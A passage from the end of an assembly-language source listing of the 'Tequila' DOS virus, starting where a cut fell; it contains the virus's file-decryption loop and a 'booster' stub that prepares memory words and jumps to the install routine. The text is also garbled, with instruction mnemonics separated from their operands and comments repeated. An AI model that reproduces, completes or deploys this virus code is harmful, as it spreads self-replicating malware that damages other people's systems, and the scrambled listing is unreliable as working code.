; extraction and pair up in order (lea w[0104],exit ... jmp install). It
; prepares the two words at 0104h/0106h and enters install; `exit` is INT 20h.
the_file_decrypting_routine: push cs pop ds mov bx,4 mov si,0964 mov cx,0960 mov dl,b[si] add b[bx],dl inc si inc bx cmp si,09a4 jb 0a7e ;masm mod. needed mov si,0964 loop 0a6f ;masm mod. needed jmp 0390 ;masm mod. needed ;========== the following is not part of the virus ======== ;========== but is merely the booster. ======== start: lea mov mov sub jmp
w[0104],exit w[0106],cs bx,cs w[0106],bx install
exit: int 020 tequila endp code_seg ends end tequila
;masm mod. needed ;masm mod. needed ;masm mod. needed